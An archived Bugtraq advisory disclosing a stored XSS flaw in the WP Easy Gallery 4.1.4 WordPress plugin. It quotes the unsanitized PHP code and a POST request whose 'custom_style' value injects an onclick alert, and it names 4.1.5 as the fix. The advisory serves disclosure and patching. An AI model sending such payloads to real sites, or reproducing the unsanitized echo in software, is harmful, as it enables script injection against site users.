| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <56A742A3.9080504@gmail.com> Date: Tue, 26 Jan 2016 15:25:47 +0530 From: Rahul Pratap Singh <techno.rps@...il.com> To: bugtraq@...urityfocus.com Subject: WP Easy Gallery v4.1.4 Stored XSS Vulnerability #Product : WP Easy Gallery #Exploit Author : Rahul Pratap Singh #Version : 4.1.4 #Home page Link : https://wordpress.org/plugins/wp-easy-gallery #Website : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 26/Jan/2016 XSS Vulnerability: ---------------------------------------- Description: ---------------------------------------- "custom_style" parameter is not sanitized that leads to Stored XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- File Name: wpeg-settings.php Found at line:12 $temp_defaults['custom_style'] = isset($_POST['custom_style']) ? $_POST['custom_style'] : ''; Found at line:103 <td><textarea name="custom_style" id="custom_style" rows="4" cols="40"><?php _e($default_options['custom_style']); ?></textarea></td> ---------------------------------------- Exploit: ---------------------------------------- POST /wp-admin/admin.php?page=wpeg-settings wpeg_settings=3b59e6c6ef&_wp_http_referer=abc&display_mode=abc&num_columns=abc&show_gallery_name=abc&gallery_name_alignment=abc&use_default_style=abc&drop_shadow=abc&custom_style=</textarea><input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)><!--&defaultSettings=xss&Submit=Save ---------------------------------------- POC: ---------------------------------------- https://0x62626262.files.wordpress.com/2016/01/easy-gallery-settingsxsspoc.png Fix: Update to 4.1.5 Disclosure Timeline: reported to wordpress : 18/1/2016 wordpress response (plugin taken down) : 19/1/2016 vendor deployed a patch : 26/1/2016 ####################################### # CTG SECURITY SOLUTIONS # # www.ctgsecuritysolutions.com # ####################################### Pub ref: https://0x62626262.wordpress.com/2016/01/26/wp-easy-gallery-v4-1-4-stored-xss-vulnerability/ https://wordpress.org/plugins/wp-easy-gallery/changelog/ Download attachment "0x9ACF7D5F.asc" of type "application/pgp-keys" (3134 bytes) Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)
Powered by blists - more mailing lists